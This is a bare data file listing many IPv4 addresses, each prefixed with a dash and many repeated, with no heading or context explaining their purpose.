-117.241.216.81 -59.96.228.225 -61.2.39.74 -117.202.142.69 -117.222.143.125 -117.254.65.41 -59.92.178.143 -117.201.13.39 -117.201.17.244 -117.202.139.86 -117.194.143.68 -117.212.176.26 -117.193.200.19 -13.68.220.240 -117.207.107.45 -105.159.74.150 -117.222.140.77 -117.222.140.22 -117.213.106.212 -61.2.33.173 -117.215.117.38 -190.136.107.210 -61.2.38.214 -117.217.213.252 -207.188.149.118 -117.193.64.18 -59.91.145.227 -83.232.225.51 -117.206.129.243 -117.193.71.124 -117.222.142.40 -59.93.68.118 -59.96.192.106 -59.93.162.175 -59.92.85.9 -59.91.151.5 -117.202.72.83 -117.201.16.165 -117.216.104.55 -41.99.113.178 -177.154.218.102 -117.193.20.88 -117.200.149.140 -117.201.20.150 -117.204.31.155 -117.213.110.202 -59.92.90.231 -117.207.79.86 -117.241.86.19 -117.193.201.69 -117.193.201.152 -117.212.176.120 -59.95.160.21 -117.221.15.25 -59.92.90.220 -117.201.26.114 -117.201.30.139 -117.221.244.73 -117.201.20.48 -200.175.82.50 -117.221.14.155 -117.200.183.130 -117.204.29.34 -61.2.217.99 -59.91.146.195 -179.187.210.207 -117.194.141.134 -59.96.228.100 -117.201.21.178 -201.55.123.171 -175.139.40.188 -167.56.101.74 -197.200.28.116 -117.221.13.60 -117.194.135.106 -179.83.218.168 -187.115.76.15 -61.0.233.187 -185.106.240.77 -177.203.164.63 -177.220.169.18 -3.127.22.179 -201.26.165.248 -45.236.240.90 -45.236.240.90 -85.13.239.210 -45.236.240.90 -109.70.138.201 -45.236.240.90 -45.236.240.90 -45.236.240.90 -94.140.123.219 -45.236.240.90 -45.236.240.90 -94.140.123.231 -45.236.240.90 -69.46.7.35 -45.236.240.90 -173.0.157.237 -14.207.0.88 -167.60.28.216 -52.34.236.148 -201.49.124.153 -45.236.240.90 -191.30.229.79 -45.236.240.90 -177.139.48.107 -88.255.54.149 -181.223.183.159 -18.194.187.32 -41.142.231.34 -3.94.159.26 -177.68.178.104 -103.49.168.148 -45.70.32.137 -45.236.240.90 -3.138.89.108 -45.236.240.90 -201.217.136.114 -45.236.240.90 -186.216.174.83 -45.236.240.90 -177.204.227.36 -201.157.59.231 -177.220.142.26 -179.191.238.216 -23.111.106.183 -179.27.152.204 -52.163.245.70 -45.236.240.90 -180.183.123.115 -81.42.231.143 -3.235.108.111 -179.162.116.241 -45.236.240.90 -41.140.233.80 -179.67.167.178 -45.236.240.90 -179.152.6.123 -45.236.240.90 -45.236.240.80 -191.253.202.22 -177.130.194.22 -45.236.240.90 -168.176.195.110 -45.236.240.90 -187.11.2.154 -45.236.240.90 -91.217.62.252 -187.32.214.252 -187.32.214.253 -175.139.208.25 -179.158.195.55 -209.10.71.90 -45.236.240.90 -191.5.206.205 -61.6.33.111 -189.1.162.112 -105.157.133.203 -213.177.18.103 -45.236.240.90 -61.5.37.131 -5.9.161.146 -3.235.108.111 -177.100.85.194 -104.210.32.74 -183.88.214.182 -183.88.214.182 -54.185.218.194 -54.201.134.22 -80.53.252.100 -196.89.169.50 -183.88.214.182 -183.88.214.182 -3.230.139.189 -196.89.169.50 -5.9.161.148 -183.88.214.182 -179.178.193.209 -183.88.214.182 -180.183.134.253 -24.116.18.218 -45.236.240.90 -183.88.214.182 -186.13.11.33 -89.108.129.25 -85.105.89.211 -117.212.176.112 -216.207.192.133 -183.88.214.182 -183.88.214.182 -45.179.75.75 -117.201.3.188 -170.246.189.127 -105.155.176.193 -179.26.24.255 -183.88.214.182 -183.88.214.182 -117.201.26.28 -105.96.198.75 -168.176.238.39 -179.215.103.113 -183.88.214.182 -183.88.214.182 -41.250.191.72 -142.169.224.80 -183.88.214.182 -183.88.214.182 -183.88.214.182 -143.117.14.141 -183.88.214.182 -183.88.214.182 -41.98.227.150 -196.64.68.50 -179.26.215.4 -171.22.25.127 -183.88.214.182 -183.88.214.182 -183.88.214.182 -94.140.123.78 -13.211.234.75 -183.88.214.182 -41.96.25.219 -183.88.214.182 -183.88.214.182 -69.46.7.35 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -117.221.13.61 -117.221.242.78 -59.90.97.205 -59.96.193.104 -59.92.181.151 -59.88.184.90 -59.96.224.184 -117.212.178.232 -117.221.6.138 -117.213.38.137 -117.197.203.123 -117.217.215.181 -117.222.137.81 -117.201.2.79 -117.202.143.104 -117.221.13.200 -197.204.163.128 -59.92.185.97 -179.162.116.241 -183.88.214.182 -117.221.15.58 -203.99.62.226 -117.221.15.148 -117.200.152.5 -117.201.17.188 -187.58.32.93 -117.202.137.38 -117.207.72.70 -187.110.233.183 -177.154.209.149 -167.60.71.98 -117.200.186.135 -117.206.129.151 -117.207.70.24 -113.172.76.217 -59.92.179.205 -117.194.141.8 -14.141.165.149 -117.221.0.102 -117.207.97.148 -209.10.71.90 -183.88.214.182 -117.202.142.137 -186.19.171.159 -177.140.204.11 -200.187.169.40 -183.88.214.182 -59.90.88.68 -59.92.178.102 -117.204.28.112 -179.187.176.85 -117.221.5.6 -117.215.114.101 -117.222.136.42 -170.0.44.201 -117.216.63.178 -117.207.66.217 -117.202.140.188 -117.201.30.209 -59.91.157.103 -183.88.214.182 -117.207.64.95 -117.213.37.180 -117.221.4.192 -117.200.155.69 -59.95.163.208 -117.222.140.74 -117.202.79.176 -117.202.139.82 -117.215.183.14 -183.88.214.182 -183.88.214.182 -183.88.214.182 -117.221.6.88 -45.236.240.90 -117.193.68.46 -183.88.214.182 -117.197.192.202 -117.194.135.84 -117.213.77.234 -117.200.181.102 -186.52.164.235 -59.98.56.147 -117.194.141.185 -105.159.232.91 -117.216.141.126 -117.241.87.3 -117.195.121.65 -59.88.180.59 -59.88.176.57 -59.92.96.14 -59.88.176.139 -117.221.1.62 -59.96.226.36 -117.200.153.213 -117.221.3.163 -183.88.214.182 -183.88.214.182 -41.96.124.1 -94.140.123.78 -186.57.117.214 -117.200.150.251 -117.202.65.142 -183.88.214.182 -59.88.187.232 -180.151.51.19 -117.221.15.37 -179.26.106.253 -117.201.31.39 -59.96.231.148 -115.87.176.85 -117.201.28.55 -61.2.39.245 -117.221.14.191 -117.201.20.147 -177.19.46.46 -117.202.72.2 -23.253.216.221 -202.169.46.85 -103.150.189.45 -183.88.214.182 -183.88.214.182 -171.22.25.127 -116.98.188.192 -183.88.214.182 -187.87.131.170 -183.88.214.182 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -200.146.247.202 -183.88.214.182 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -191.251.51.247 -183.88.214.182 -13.38.110.233 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -200.135.190.64 -183.88.214.182 -183.88.214.182 -201.22.170.78 -45.236.240.90 -177.98.254.49 -177.100.211.133 -183.88.214.182 -183.88.214.182 -45.236.240.90 -201.47.162.196 -41.96.182.129 -183.88.214.182 -150.242.182.65 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -194.209.11.97 -183.88.214.182 -45.236.240.90 -183.88.214.182 -44.200.82.140 -183.88.214.182 -183.88.214.182 -196.89.168.139 -69.46.7.35 -183.88.214.182 -189.18.219.197 -183.88.214.182 -52.220.237.249 -183.88.214.182 -183.88.214.182 -187.45.177.228 -183.88.214.182 -131.100.148.76 -183.88.214.182 -179.183.38.183 -183.88.214.182 -45.236.240.90 -183.88.214.182 -5.9.161.149 -45.236.240.90 -45.236.240.90 -189.210.155.140 -183.88.214.182 -183.88.214.182 -187.19.100.241 -183.88.214.182 -183.88.214.182 -45.236.240.90 -45.237.203.16 -183.88.214.182 -191.184.228.97 -183.88.214.182 -183.88.214.182 -183.88.214.182 -54.209.116.220 -183.88.214.182 -183.88.214.182 -183.88.214.182 -18.209.254.210 -183.88.214.182 -183.88.214.182 -201.68.169.45 -183.88.214.182 -45.236.240.90 -105.97.67.177 -45.236.240.90 -183.88.214.182 -45.236.240.90 -191.35.79.104 -183.88.214.182 -183.88.214.182 -177.22.36.236 -45.236.240.90 -41.99.111.51 -160.176.122.92 -183.88.214.182 -183.88.214.182 -189.112.185.201 -45.236.240.90 -41.99.66.186 -37.104.99.151 -45.236.240.90 -186.54.216.65 -183.88.214.182 -139.112.129.92 -41.251.134.236 -183.88.214.182 -45.236.240.90 -171.22.25.127 -45.236.240.90 -171.22.25.127 -183.88.214.182 -177.134.167.170 -183.88.214.182 -186.242.72.81 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -186.54.81.219 -45.236.240.90 -85.35.97.218 -183.88.214.182 -60.51.17.241 -45.236.240.90 -82.213.48.150 -183.88.214.182 -113.193.191.37 -191.34.231.170 -177.126.153.102 -186.214.33.181 -177.205.80.118 -41.96.134.251 -3.6.197.244 -18.211.178.64 -142.217.200.196 -181.97.221.73 -41.98.249.33 -177.154.217.182 -167.57.149.171 -37.104.92.180 -186.57.112.128 -179.162.107.234 -177.97.114.92 -59.88.182.10 -168.232.152.132 -117.207.74.149 -41.143.50.201 -124.82.84.156 -105.99.89.220 -180.75.11.119 -186.48.91.102 -66.97.46.191 -117.200.145.215 -117.221.3.61 -117.202.138.210 -41.97.102.242 -54.225.86.32 -171.22.25.127 -117.221.247.0 -59.92.80.131 -117.213.66.16 -187.191.19.244 -117.193.206.172 -117.201.17.177 -117.201.23.182 -117.221.12.148 -117.201.22.206 -59.98.56.244 -46.21.94.158 -117.200.183.179 -40.80.93.142 -183.88.214.182 -183.88.214.182 -199.38.169.23 -183.88.214.182 -61.12.78.51 -183.88.214.182 -183.88.214.182 -183.88.214.182 -200.149.27.76 -45.236.240.90 -187.115.67.92 -183.88.214.182 -183.88.214.182 -52.60.74.188 -105.156.92.240 -216.17.18.144 -154.115.3.21 -45.236.240.90 -92.223.184.229 -183.88.214.182 -179.219.34.125 -201.22.148.88 -183.88.214.182 -168.196.16.116 -186.85.247.161 -188.39.111.67 -125.24.149.130 -183.88.214.182 -183.88.214.182 -218.111.151.89 -115.133.110.80 -52.55.188.92 -44.200.137.39 -189.41.247.138 -191.33.13.121 -183.88.214.182 -41.142.235.149 -183.88.214.182 -36.80.68.212 -183.88.214.182 -175.136.17.27 -183.88.214.182 -51.38.180.159 -54.225.86.32 -45.236.240.90 -45.236.240.90 -183.88.214.182 -18.211.178.64 -183.88.214.182 -95.51.128.245 -41.103.244.226 -45.179.75.91 -83.0.197.34 -179.26.232.61 -183.88.214.182 -183.88.214.182 -41.141.203.27 -37.104.72.160 -179.26.136.14 -183.88.214.182 -41.96.84.109 -41.142.80.195 -183.88.214.182 -187.21.48.105 -183.88.214.182 -117.201.15.141 -187.36.138.27 -183.88.214.182 -61.12.78.50 -183.88.214.182 -183.88.214.182 -187.34.78.228 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -185.113.50.140 -177.74.66.110 -183.88.214.182 -177.158.14.33 -191.32.38.27 -41.99.183.237 -180.75.8.163 -45.236.240.90 -177.10.197.141 -189.112.72.54 -115.87.177.1 -50.18.204.218 -167.57.249.182 -183.88.214.182 -45.236.240.90 -37.104.79.139 -183.88.214.182 -20.96.82.34 -41.99.31.34 -181.97.222.108 -177.206.70.56 -187.59.104.155 -177.50.189.17 -177.154.213.6 -189.154.41.111 -41.99.79.190 -200.214.44.213 -41.250.173.199 -41.220.193.38 -59.92.185.123 -45.236.240.90 -186.52.185.11 -105.156.31.86 -167.60.75.255 -117.221.6.207 -186.57.115.6 -117.202.138.47 -117.241.70.90 -88.119.154.115 -183.88.214.182 -179.191.239.235 -179.178.239.88 -54.193.202.22 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -200.155.130.18 -183.88.214.182 -45.236.240.90 -45.236.240.90 -183.88.214.182 -191.35.39.244 -171.22.25.127 -183.88.214.182 -183.88.214.182 -186.210.30.237 -183.88.214.182 -183.88.214.182 -146.88.64.82 -70.186.250.230 -44.198.184.87 -94.99.112.156 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -170.244.32.9 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -171.22.25.127 -45.236.240.90 -212.55.219.126 -44.198.184.87 -200.179.75.143 -153.127.9.156 -43.224.139.171 -45.236.240.90 -105.157.132.144 -180.183.112.244 -45.236.240.90 -208.67.130.244 -43.224.139.175 -3.22.0.7 -45.236.240.90 -177.148.185.88 -13.38.101.71 -183.88.214.182 -183.88.214.182 -45.236.240.90 -171.22.25.127 -41.99.78.117 -41.96.188.155 -45.179.75.89 -186.48.255.61 -80.242.76.56 -196.77.31.167 -3.127.22.193 -45.236.240.90 -183.88.214.182 -171.22.25.127 -45.175.144.239 -191.221.217.83 -5.56.63.221 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -45.236.240.90 -177.66.154.231 -154.115.3.1 -43.224.139.172 -183.88.214.182 -45.236.240.90 -168.176.195.109 -177.50.168.41 -41.99.121.241 -191.253.195.142 -167.56.72.43 -41.98.245.81 -117.221.13.32 -60.53.38.123 -177.101.110.217 -153.127.9.156 -200.187.170.106 -207.188.144.207 -80.89.213.222 -187.44.84.140 -45.236.240.90 -160.176.125.224 -105.155.44.48 -186.53.122.131 -59.95.161.134 -177.18.251.118 -138.118.149.200 -186.55.182.26 -186.52.112.222 -186.57.114.222 -59.92.101.252 -167.56.80.255 -183.88.214.182 -200.75.18.27 -183.88.214.182 -183.88.214.182 -213.168.177.66 -117.222.143.44 -191.190.69.129 -183.88.214.182 -201.43.246.4 -15.160.48.221 -186.248.93.43 -125.27.176.66 -183.88.214.182 -183.88.214.182 -183.88.214.182 -13.49.80.47 -199.66.220.186 -115.133.55.95 -216.238.16.162 -149.202.41.22 -183.88.214.182 -202.137.22.30 -43.224.139.177 -109.69.188.66 -179.95.83.112 -187.39.15.14 -54.73.18.31 -18.229.186.133 -186.52.146.25 -183.88.214.182 -183.88.214.182 -183.88.214.182 -54.154.217.190 -177.194.134.183 -45.236.240.90 -191.31.96.196 -168.90.168.50 -45.236.240.90 -61.94.199.236 -183.88.214.182 -58.26.53.48 -216.238.16.180 -216.238.16.162 -216.238.16.163 -196.92.147.18 -3.0.58.134 -179.95.198.165 -182.71.76.99 -183.88.214.182 -54.242.217.100 -183.88.214.182 -1.9.214.188 -80.89.213.222 -124.120.143.58 -45.236.240.90 -18.133.74.219 -13.244.97.43 -183.88.214.182 -117.221.138.1 -182.176.47.55 -183.88.214.182 -191.54.63.155 -216.238.16.163 -94.230.19.45 -94.230.19.50 -41.96.223.41 -183.88.214.182 -41.99.92.146 -105.156.108.172 -45.236.240.90 -168.232.152.101 -201.16.184.95 -194.78.211.169 -45.236.240.90 -196.92.138.208 -45.236.240.90 -201.8.160.194 -34.200.18.78 -15.160.179.104 -183.88.214.182 -189.2.181.180 -54.242.217.100 -143.208.173.138 -219.74.176.185 -45.236.240.90 -186.48.124.102 -183.88.214.182 -45.236.240.90 -183.88.214.182 -177.177.91.127 -183.88.214.182 -52.19.32.2 -186.210.91.1 -179.26.77.254 -216.238.16.162 -177.18.155.7 -186.57.108.85 -186.48.52.209 -170.0.44.251 -177.50.183.77 -177.133.38.96 -186.50.242.21 -189.34.148.116 -105.154.204.42 -41.97.74.141 -3.7.229.229 -41.97.247.55 -167.60.195.27 -196.65.102.27 -216.238.16.180 -216.238.16.163 -187.111.21.21 -15.222.7.217 -199.66.220.186 -191.37.3.210 -191.253.106.118 -191.32.31.27 -191.252.0.101 -186.48.79.133 -117.194.134.1 -186.210.94.210 -45.236.240.90 -179.176.206.123 -117.241.86.79 -186.249.201.227 -183.88.214.182 -91.228.9.178 -177.159.75.138 -183.88.214.182 -45.236.240.90 -187.59.237.241 -183.88.214.182 -41.140.161.94 -200.96.181.212 -45.236.240.90 -183.88.214.182 -171.22.25.127 -177.249.164.23 -45.236.240.90 -69.46.7.35 -45.236.240.90 -45.236.240.90 -191.249.126.47 -183.88.214.182 -45.236.240.90 -45.236.240.90 -189.201.203.198 -175.139.204.96 -45.236.240.90 -171.22.25.127 -81.192.52.122 -52.205.124.237 -45.236.240.90 -14.207.2.115 -103.121.149.26 -216.207.192.64 -183.88.214.182 -183.88.214.182 -183.88.214.182 -177.193.187.239 -45.236.240.90 -183.88.214.182 -179.222.22.167 -191.254.37.77 -45.236.240.90 -179.185.68.141 -183.88.214.182 -177.73.71.118 -183.88.214.182 -191.241.246.62 -105.158.66.41 -45.236.240.90 -45.236.240.90 -183.88.214.182 -115.132.227.199 -202.188.122.221 -59.92.187.80 -132.255.147.34 -177.133.31.58 -193.108.160.160 -105.158.66.41 -183.88.214.182 -193.26.217.9 -189.5.126.61 -216.184.89.170 -201.22.160.251 -187.39.213.96 -52.205.124.237 -179.228.93.83 -186.138.66.199 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -170.84.39.38 -186.215.138.100 -41.97.184.196 -191.251.32.117 -187.18.108.29 -45.179.75.87 -187.32.109.53 -41.103.238.209 -45.236.240.90 -183.88.214.182 -183.88.214.182 -152.156.126.90 -183.88.214.182 -8.36.139.144 -197.204.146.236 -186.209.48.2 -41.251.194.80 -45.230.226.242 -179.26.77.182 -45.236.240.90 -186.213.242.240 -183.88.214.182 -177.16.195.39 -183.88.214.182 -18.130.217.169 -183.88.214.182 -15.222.234.202 -177.130.252.94 -183.88.214.182 -183.88.214.182 -183.88.214.182 -177.40.95.187 -186.214.222.114 -189.113.119.178 -189.139.167.10 -45.236.240.90 -177.184.12.69 -181.49.14.98 -52.67.203.7 -18.218.56.51 -45.236.240.90 -177.95.9.143 -18.214.64.35 -168.197.114.161 -41.230.1.4 -186.214.184.142 -54.247.118.243 -138.122.166.170 -179.162.108.84 -186.57.119.191 -190.134.15.221 -45.236.240.90 -31.216.41.86 -117.213.66.232 -177.191.249.9 -177.54.19.99 -59.92.180.193 -189.231.108.121 -117.202.139.25 -117.201.16.234 -203.223.190.112 -117.202.140.66 -41.96.193.76 -117.202.143.45 -59.92.94.189 -197.204.246.199 -117.193.212.13 -117.202.73.79 -59.96.192.174 -117.221.235.246 -117.217.216.42 -186.52.196.18 -61.2.72.206 -61.2.37.213 -117.201.14.3 -117.197.204.245 -117.221.15.168 -59.92.82.96 -168.197.114.161 -117.215.118.49 -41.96.125.193 -59.96.231.229 -168.197.114.161 -178.254.85.251 -219.95.70.172 -117.213.111.72 -117.193.202.177 -117.201.15.134 -186.251.180.84 -61.3.202.72 -117.197.203.1 -117.221.1.142 -117.213.109.244 -59.93.161.105 -117.194.132.161 -167.61.204.43 -59.96.228.199 -117.194.132.113 -61.1.154.152 -59.93.68.164 -59.93.68.120 -117.215.183.75 -117.221.13.17 -117.200.158.144 -117.193.69.50 -117.212.183.19 -159.69.198.221 -117.194.129.44 -117.206.129.228 -196.74.111.186 -168.197.114.161 -183.88.214.182 -170.83.44.127 -177.129.12.226 -183.88.214.182 -167.60.161.119 -191.35.73.122 -168.197.114.161 -186.211.95.7 -69.46.7.35 -183.88.214.182 -168.197.114.161 -168.197.114.161 -183.88.214.182 -168.197.114.161 -183.88.214.182 -168.197.114.161 -183.88.214.182 -118.127.118.242 -168.197.114.161 -183.88.214.182 -200.105.84.194 -189.27.24.39 -168.197.114.161 -183.88.214.182 -183.88.214.182 -177.200.202.66 -187.108.204.246 -14.207.4.80 -183.88.214.182 -20.101.52.139 -175.139.187.225 -216.17.18.128 -189.204.180.44 -117.202.47.77 -105.158.66.212 -85.90.3.53 -45.236.240.90 -3.89.190.54 -115.131.146.52 -183.88.214.182 -117.217.212.185 -183.88.214.182 -186.210.220.173 -168.197.114.161 -168.197.114.161 -138.219.192.102 -194.179.53.218 -183.88.214.182 -3.89.190.54 -201.89.245.18 -45.236.240.90 -3.89.232.136 -189.204.180.44 -60.50.145.66 -191.33.4.9 -110.138.210.21 -175.138.8.43 -186.206.169.166 -200.75.18.27 -189.59.59.237 -45.236.240.90 -85.90.3.53 -41.99.194.98 -46.170.126.178 -168.197.114.161 -91.228.9.178 -168.197.114.161 -124.120.88.114 -41.97.199.104 -197.204.19.94 -105.157.84.94 -164.177.34.101 -179.26.217.249 -183.88.214.182 -196.77.163.211 -168.197.114.161 -41.99.41.17 -168.197.114.161 -105.99.106.187 -179.24.242.194 -179.154.242.167 -168.197.114.161 -179.187.40.90 -183.88.214.182 -183.88.214.182 -117.194.135.169 -168.197.114.161 -45.236.240.90 -183.88.214.182 -183.88.214.182 -168.197.114.161 -74.198.134.134 -117.201.31.100 -117.212.190.150 -168.197.114.161 -45.236.240.90 -179.104.164.215 -45.236.240.90 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -186.222.23.135 -168.197.114.161 -168.197.114.161 -41.99.76.39 -117.217.216.198 -180.75.70.199 -45.236.240.90 -186.52.140.78 -52.177.149.5 -190.136.128.119 -41.99.122.189 -177.154.218.78 -167.57.225.190 -183.88.214.182 -175.139.40.54 -105.102.237.234 -191.55.143.61 -186.215.61.10 -52.71.172.232 -179.183.20.133 -183.88.214.182 -189.63.220.206 -77.31.20.116 -75.101.247.177 -186.206.240.163 -196.65.139.56 -168.197.114.161 -45.236.240.90 -167.57.165.28 -177.50.177.39 -179.177.173.220 -179.252.27.162 -179.162.108.84 -175.138.64.26 -168.197.114.161 -181.213.41.116 -196.218.13.108 -168.197.114.161 -168.197.114.161 -183.88.214.182 -117.201.26.56 -179.181.81.20 -37.252.123.143 -117.200.152.130 -183.88.214.182 -177.94.205.223 -187.58.193.229 -201.76.188.26 -183.88.214.182 -80.15.195.109 -168.197.114.161 -45.236.240.90 -183.88.214.182 -189.210.155.139 -200.57.228.89 -175.139.224.112 -45.236.240.90 -183.88.214.182 -3.89.232.136 -168.197.114.161 -45.236.240.90 -45.236.240.90 -45.236.240.90 -183.88.214.182 -189.5.157.156 -203.115.196.131 -59.99.209.155 -191.185.135.19 -200.75.18.27 -191.33.88.250 -45.236.240.90 -201.43.246.90 -183.88.214.182 -189.5.157.253 -3.228.5.22 -189.19.167.232 -41.96.168.117 -45.236.240.90 -45.236.240.90 -210.118.123.104 -168.197.114.161 -183.88.214.182 -91.216.103.152 -183.88.214.182 -91.216.103.141 -41.140.164.51 -175.141.46.254 -110.4.40.83 -168.197.114.161 -183.88.214.182 -82.137.249.236 -175.143.89.54 -103.161.92.102 -183.88.214.182 -168.197.114.161 -59.92.95.214 -177.46.143.191 -183.88.214.182 -45.236.240.90 -45.236.240.90 -179.24.213.9 -105.99.123.71 -131.196.100.208 -41.103.244.238 -95.51.128.244 -34.226.71.76 -138.94.109.148 -170.83.44.74 -37.104.90.165 -75.101.247.177 -177.85.225.221 -41.99.94.162 -77.31.26.252 -168.197.114.161 -164.163.239.99 -183.88.214.182 -189.25.96.199 -183.88.214.182 -168.197.114.161 -168.197.114.161 -168.197.114.161 -82.71.212.133 -216.207.192.197 -183.88.214.182 -179.187.243.101 -117.202.138.208 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -170.79.250.254 -183.88.214.182 -179.83.30.216 -191.223.132.128 -200.157.34.82 -180.75.11.245 -34.226.71.76 -201.35.188.151 -189.114.35.228 -41.99.114.1 -189.114.46.144 -41.96.210.7 -186.54.212.30 -179.83.185.21 -50.112.52.21 -171.22.25.127 -45.236.240.90 -186.57.105.173 -105.102.181.123 -186.55.176.219 -131.221.64.66 -168.197.114.161 -168.197.114.161 -45.236.240.90 -189.57.216.211 -82.190.118.149 -183.88.214.182 -183.88.214.182 -177.202.114.113 -13.208.245.117 -45.236.240.90 -117.213.68.123 -189.210.155.138 -168.197.114.161 -189.46.153.222 -183.88.214.182 -117.221.242.101 -183.88.214.182 -194.177.203.105 -168.197.114.161 -45.236.240.90 -183.88.214.182 -177.41.81.41 -201.16.166.190 -177.205.126.61 -191.33.69.12 -209.145.53.19 -45.236.240.90 -191.251.92.93 -183.88.214.182 -52.4.228.8 -183.88.214.182 -119.2.118.103 -189.63.86.34 -54.90.174.203 -183.88.214.182 -171.22.25.127 -180.183.116.210 -183.88.214.182 -168.197.114.161 -77.75.102.51 -45.236.240.90 -3.234.45.125 -168.197.114.161 -187.19.165.125 -2.37.230.115 -45.236.240.90 -168.197.114.161 -168.197.114.161 -168.197.114.161 -168.197.114.161 -183.88.214.182 -168.197.114.161 -115.133.195.67 -54.90.174.203 -200.158.183.8 -191.33.4.219 -20.42.104.203 -45.236.240.90 -52.45.42.245 -178.254.109.27 -45.236.240.90 -183.88.214.182 -200.123.26.73 -54.224.88.107 -41.142.71.178 -125.164.144.172 -200.17.233.226 -175.136.16.239 -183.88.214.182 -199.101.246.201 -199.101.246.209 -183.88.214.182 -183.88.214.182 -52.4.228.8 -168.197.114.161 -187.40.81.158 -91.224.13.39 -189.63.27.104 -185.29.79.194 -183.88.214.182 -45.236.240.90 -168.197.114.161 -168.197.114.161 -168.197.114.161 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -185.56.8.197 -45.236.240.90 -45.236.240.90 -45.236.240.90 -18.191.44.215 -212.125.32.59 -189.103.108.41 -200.185.228.167 -117.193.21.82 -189.231.125.79 -183.88.214.182 -45.236.240.90 -196.64.73.178 -168.197.114.161 -54.80.24.187 -45.236.240.90 -191.33.31.82 -183.88.214.182 -45.236.240.90 -179.0.206.58 -83.0.71.161 -187.65.151.19 -45.236.240.90 -177.98.240.195 -89.231.198.103 -187.21.59.6 -46.186.42.159 -183.88.214.182 -37.104.72.1 -183.88.214.182 -124.120.87.187 -197.204.47.42 -179.26.67.244 -186.210.93.116 -183.88.214.182 -186.202.136.88 -45.236.240.90 -183.88.214.182 -191.185.140.149 -45.236.240.90 -91.216.103.140 -183.88.214.182 -121.123.39.154 -187.113.19.25 -41.98.11.27 -186.214.234.227 -183.88.214.182 -160.177.151.22 -45.236.240.90 -171.22.25.127 -69.47.57.54 -45.236.240.90 -54.145.109.223 -152.250.250.96 -183.88.214.182 -89.187.66.107 -45.236.240.90 -117.202.65.181 -190.19.113.207 -59.91.148.240 -41.96.21.250 -117.201.18.249 -41.96.250.116 -59.96.226.250 -117.221.8.74 -183.88.214.182 -117.200.77.221 -117.221.13.48 -117.221.12.234 -179.176.111.103 -117.201.28.223 -117.221.13.234 -59.88.181.133 -59.93.163.120 -117.200.187.189 -181.24.154.218 -207.188.145.120 -117.222.142.250 -117.201.23.166 -61.3.202.134 -59.88.182.222 -117.193.213.164 -79.61.35.232 -117.213.39.206 -189.154.130.217 -117.201.31.18 -117.222.140.125 -183.88.214.182 -177.50.174.176 -183.88.214.182 -179.27.158.24 -46.21.94.158 -213.190.70.119 -213.190.70.200 -179.184.129.82 -167.60.219.135 -68.188.65.6 -170.0.46.133 -5.172.190.16 -121.58.242.66 -189.112.81.250 -37.104.64.61 -187.32.161.108 -34.202.72.163 -177.154.195.137 -76.190.105.248 -196.70.55.73 -34.233.52.147 -179.162.29.253 -197.204.119.67 -54.204.60.43 -186.113.7.95 -54.212.213.149 -183.88.214.182 -187.58.179.16 -81.44.174.232 -175.139.187.225 -179.176.106.42 -177.98.170.44 -45.236.240.90 -183.88.214.182 -186.1.161.70 -191.250.55.129 -45.236.240.90 -183.88.214.182 -200.187.176.222 -189.91.227.17 -183.88.214.182 -177.100.209.228 -191.251.55.196 -170.145.102.18 -196.70.120.49 -177.19.218.21 -187.58.27.234 -45.236.240.90 -179.84.70.63 -45.236.240.90 -60.53.6.149 -200.236.12.2 -44.197.208.62 -74.198.132.134 -80.17.46.114 -54.144.227.226 -189.50.113.239 -45.236.240.90 -189.78.197.251 -105.159.180.33 -191.186.193.164 -45.236.240.90 -47.88.56.146 -180.247.232.6 -41.98.245.187 -79.188.136.130 -160.179.86.178 -187.39.41.34 -49.248.108.180 -187.58.58.37 -160.176.238.47 -3.96.212.113 -3.144.225.225 -45.236.240.90 -197.204.44.43 -177.75.8.22 -41.97.103.124 -41.103.240.75 -45.179.75.124 -45.236.240.90 -45.236.240.90 -45.175.144.242 -212.156.94.134 -85.89.40.162 -74.113.41.254 -189.89.152.106 -191.31.26.164 -45.236.240.90 -186.113.6.115 -181.213.49.93 -177.191.55.72 -45.236.240.90 -54.233.167.50 -197.204.192.227 -117.212.180.234 -59.92.91.195 -54.94.111.193 -179.162.190.179 -117.216.9.51 -52.67.122.23 -117.202.186.152 -59.89.207.147 -190.134.217.9 -117.212.182.243 -117.201.20.184 -59.91.157.46 -117.193.205.123 -117.194.132.255 -117.216.59.47 -59.92.82.158 -117.221.10.104 -117.201.0.7 -59.92.93.230 -181.24.149.75 -61.2.33.130 -59.92.94.70 -59.88.191.108 -59.92.82.40 -117.221.137.82 -59.92.237.154 -59.92.85.159 -117.221.12.107 -117.201.30.65 -59.91.147.194 -117.201.31.205 -59.89.193.123 -189.62.57.15 -59.91.152.89 -61.3.201.90 -177.133.12.46 -61.3.241.92 -77.31.17.4 -117.193.67.252 -117.221.14.212 -59.88.177.132 -59.93.68.60 -117.213.105.130 -59.92.89.138 -200.175.174.43 -61.1.155.107 -167.60.20.151 -117.221.12.242 -177.206.141.103 -117.222.136.199 -41.140.74.71 -117.201.10.70 -117.201.18.126 -117.221.240.34 -59.91.146.80 -59.96.224.236 -117.222.139.88 -80.17.45.61 -59.88.185.129 -177.50.175.73 -117.213.106.93 -117.221.13.153 -117.200.155.36 -61.3.244.82 -117.221.11.13 -167.60.230.224 -80.17.46.40 -117.206.128.70 -177.191.0.128 -186.52.228.27 